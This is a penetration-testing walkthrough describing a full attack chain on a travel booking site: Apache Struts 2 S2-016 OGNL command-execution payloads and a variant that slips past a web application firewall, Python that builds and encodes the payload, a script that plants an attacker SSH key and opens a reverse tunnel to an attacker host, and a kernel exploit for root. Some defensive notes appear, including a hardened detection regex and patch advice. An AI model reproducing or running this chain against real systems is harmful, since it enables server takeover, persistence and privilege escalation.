A penetration walkthrough: bypassing the application firewall to obtain RCE, then escalating privileges to root

 

This article is about Apache Struts 2 CVE-2013-2251 (S2-016), a heavily exploited vulnerability because it leads to remote command execution. In short, request parameters prefixed with "action:", "redirect:" or "redirectAction:" are evaluated as OGNL expressions, which allows remote command execution in Java web applications built on Struts 2.0.0 through 2.3.15 (fixed in 2.3.15.1).

 

Now that the bug has spread widely, the major application-firewall vendors have updated their rule engines and detection technology to block it. But the author was not only able to bypass the firewall and gain remote code execution, but also to escalate privileges to root on the server by exploiting a kernel vulnerability.

 

While testing a travel booking website, the author wanted to find out whether the application was running on a vulnerable Apache Struts framework. To do that, it is enough to try the three vulnerable parameter prefixes ("action", "redirect", "redirectAction") with a working attack payload. A Google search turned up a blog post with a proof of concept (the payload has to be built as an OGNL expression): http://blog.opensecurityresearch.com/2014/02/attacking-struts-with-cve-2013-2251.html . The following is the payload used to run the command "ifconfig":

redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'ifconfig'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}

But, as expected, it was blocked by the application firewall, which redirected the request to a bot-detection page.

When this happens, remember what was pointed out earlier: we know which parameters are vulnerable, and one of them is the "redirect" parameter used in the request above. "redirect", yes, exactly: let's try an actual redirect here, simply redirecting to http://www.goal.com.

As you can see, the author got a 302 redirect to the location http://www.goal.com. So the earlier ifconfig payload was blocked, but a plain redirect went through, and that gave the author the idea for bypassing the firewall: keep the parameter looking like a harmless redirect URL and append the OGNL expression after it. The payload above was therefore modified as follows:

redirect:http://www.goal.com/${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'ifconfig'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}

and send the request. The response shows the output of the "ifconfig" command: the payload got past the firewall and the command ran on the server.
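To make the bypass concrete, here is an added example (not the article's or the linked blog's code). It rebuilds the article's payload, produces the URL-prefixed variant, percent-encodes it for a GET request, and runs both through two illustrative firewall rules. The two regexes are constructed for this example to show the class of rule the prefix defeats and one that does not; they are not any vendor's signatures.

```python
"""Added example: build the S2-016 payload, the URL-prefixed bypass variant, and
test both against two illustrative WAF rules (constructed here, not vendor rules)."""
import re
from urllib.parse import quote

# OGNL body from the article: start a process, read its stdout into a buffer and
# write that buffer straight into the HTTP response. {cmd} is filled in below.
OGNL_TEMPLATE = (
    "#a=(new java.lang.ProcessBuilder(new java.lang.String[]{{'{cmd}'}})).start(),"
    "#b=#a.getInputStream(),"
    "#c=new java.io.InputStreamReader(#b),"
    "#d=new java.io.BufferedReader(#c),"
    "#e=new char[50000],#d.read(#e),"
    "#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),"
    "#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()"
)


def build_param(cmd, prefix_url=None):
    """Return the parameter NAME that vulnerable Struts evaluates as OGNL.

    prefix_url=None gives the article's original "redirect:${...}" payload.
    With a URL it gives the variant that got past the firewall: the parameter
    starts with an ordinary absolute URL and the ${...} expression follows as
    a path segment, so a rule keyed on "redirect:${" never sees that sequence.
    """
    expr = "${" + OGNL_TEMPLATE.format(cmd=cmd) + "}"
    if prefix_url is None:
        return "redirect:" + expr
    return "redirect:" + prefix_url.rstrip("/") + "/" + expr


def build_query(cmd, prefix_url=None):
    """Percent-encode the payload as a GET query string; the value is empty
    because Struts acts on the parameter name, not its value."""
    return quote(build_param(cmd, prefix_url), safe="") + "="


# Rule of the kind that stops the stock PoC: it anchors on the literal "redirect:${".
NAIVE_RULE = re.compile(r"^(redirect|redirectAction|action):\$\{", re.IGNORECASE)

# Rule keyed on what matters: one of the three prefixes, then OGNL delimiters,
# the ProcessBuilder sink or the #context root anywhere later in the name.
HARDENED_RULE = re.compile(
    r"^(redirect|redirectAction|action):.*"
    r"(\$\{|%\{|java\.lang\.ProcessBuilder|#context)",
    re.IGNORECASE | re.DOTALL,
)


def blocked_by(rule, param_name):
    """True if the (already URL-decoded) parameter name trips the rule."""
    return rule.search(param_name) is not None


if __name__ == "__main__":
    for label, param in (("original", build_param("ifconfig")),
                         ("url-prefixed", build_param("ifconfig", "http://www.goal.com"))):
        print(f"{label:13s} naive={blocked_by(NAIVE_RULE, param)} "
              f"hardened={blocked_by(HARDENED_RULE, param)}")
    print(build_query("ifconfig", "http://www.goal.com")[:60] + "...")
```

The naive rule trips on the literal sequence redirect:${, so moving the expression behind a URL is enough to slip past it. A rule worth keeping looks for the OGNL delimiters, the ProcessBuilder sink or the #context root anywhere after the prefix, and it still needs to run on the decoded parameter name. The firewall is a stopgap either way: the fix is Struts 2.3.15.1, which stops evaluating these prefixes as OGNL.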

The next goal is to get a remote shell on the server. The author uses reverse SSH tunneling with public-key authentication, which lets SSH users log in without entering a password. That means the attacker server's SSH public key must be placed in the victim server's ~/.ssh/authorized_keys, and, because the victim will be the side that opens the reverse tunnel, the victim SSH server's id_rsa.pub must also be added to the attacker's authorized_keys. To explain the two terms and the idea of public-key authentication: id_rsa.pub is the public key that you add to the authorized_keys file of other hosts to allow you to log in as that user; authorized_keys is the list of public keys that are allowed to log in to a specific account on a specific server.

Step 1 - Use the RCE to find the location of the victim server's id_rsa.pub file.

Step 2 - Copy authorized_keys from the victim server to the attacker server.

Step 3 - Copy the modified authorized_keys (now containing the attacker's public key) back from the attacker server to the victim, and add the victim's id_rsa.pub, found in step 1, to the attacker's authorized_keys; the shell is then obtained through the tunnel.

Last step - Open the reverse SSH tunnel to the attacker machine and log in through it, by running the following command line:
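The four steps above, as an added example that is not the article's code. The first function performs the authorized_keys edit of steps 2 and 3 idempotently and with the file mode sshd insists on, exercised against a constructed key in a temporary directory; the second returns the standard ssh -R command pair for a reverse tunnel, given as an assumption, since the author's own command line did not survive on this page. Host names, user names and the port are placeholders.

```python
"""Added example: idempotent authorized_keys edit (steps 2 and 3) and the standard
ssh -R reverse-tunnel command pair (an assumption; the article's command is missing)."""
import os
import tempfile

# Constructed key for the demonstration; not a real key.
ATTACKER_PUBKEY = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0example attacker@attacker-box"


def add_authorized_key(authorized_keys_path, pubkey_line):
    """Append pubkey_line to authorized_keys unless the same key is already there.

    Returns True if the file changed. Entries are compared on key type and
    base64 blob so a different comment does not create a duplicate, and the
    file is left at mode 0600: with StrictModes (the default) sshd refuses to
    read an authorized_keys that others can write, and a loose mode is also
    the first thing an administrator notices.
    """
    key_type, blob = pubkey_line.split()[:2]
    if os.path.exists(authorized_keys_path):
        with open(authorized_keys_path) as fh:
            for line in fh:
                parts = line.split()
                # An options field ("no-pty ssh-rsa AAAA...") may precede the type.
                if key_type in parts and blob in parts:
                    return False
    os.makedirs(os.path.dirname(authorized_keys_path) or ".", mode=0o700, exist_ok=True)
    with open(authorized_keys_path, "a") as fh:
        fh.write(pubkey_line.rstrip("\n") + "\n")
    os.chmod(authorized_keys_path, 0o600)
    return True


def reverse_tunnel_commands(attacker_host, attacker_user, victim_user, remote_port=2222):
    """Return (command run on the victim, command run on the attacker).

    The victim, whose id_rsa.pub is in the attacker's authorized_keys, dials
    out (-R) and exposes its own sshd on attacker_host:remote_port; the
    attacker, whose key is in the victim's authorized_keys, then logs in
    through that port. Outbound SSH from the victim is assumed to be allowed;
    StrictHostKeyChecking=no avoids the host-key prompt from a non-interactive shell.
    """
    on_victim = (
        f"ssh -f -N -o StrictHostKeyChecking=no "
        f"-R {remote_port}:localhost:22 {attacker_user}@{attacker_host}"
    )
    on_attacker = f"ssh -p {remote_port} {victim_user}@localhost"
    return on_victim, on_attacker


def demo():
    """Run the edit twice against a temp file; returns (changed, changed, lines, mode)."""
    path = os.path.join(tempfile.mkdtemp(), ".ssh", "authorized_keys")
    first = add_authorized_key(path, ATTACKER_PUBKEY)
    # Same key, different comment: must be recognised as already present.
    second = add_authorized_key(path, ATTACKER_PUBKEY.rsplit(" ", 1)[0] + " renamed")
    with open(path) as fh:
        n_lines = len(fh.readlines())
    return first, second, n_lines, os.stat(path).st_mode & 0o777


if __name__ == "__main__":
    print(demo())
    for cmd in reverse_tunnel_commands("203.0.113.5", "tunnel", "www-data"):
        print(cmd)
```

Running the edit through the RCE rather than by hand is what makes the duplicate check matter: a web shell that re-runs on every request would otherwise grow the file, and a file that sshd rejects for loose permissions leaves you with no tunnel at all.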

 

 

This gives a remote shell on the server, but not the right to log in as root, which means only limited rights to read files and execute commands. Now, to obtain the right to log in as root, the author first checks which kernel version is running on the victim machine:

This revealed kernel version 2.6.32. A Google search for an exploitable CVE turned up CVE-2013-2094, the perf_event_open() local privilege-escalation bug, which is easy to use for account privilege escalation: https://github.com/realtalk/cve-2013-2094 . With it, root privileges were finally obtained. One caveat for anyone reproducing the check: upstream the bug exists in 2.6.37 through 3.8.8, and a 2.6.32 kernel is only exploitable because Red Hat Enterprise Linux 6 and its rebuilds backported the affected perf code into their 2.6.32 kernels, so the bare version number is not a reliable indicator either way; the distribution's kernel package version is what to compare against the vendor advisory.

That is how a remote shell as the root user was obtained on the server by combining the Apache Struts 2 vulnerability with an exploit for the running kernel version.

 


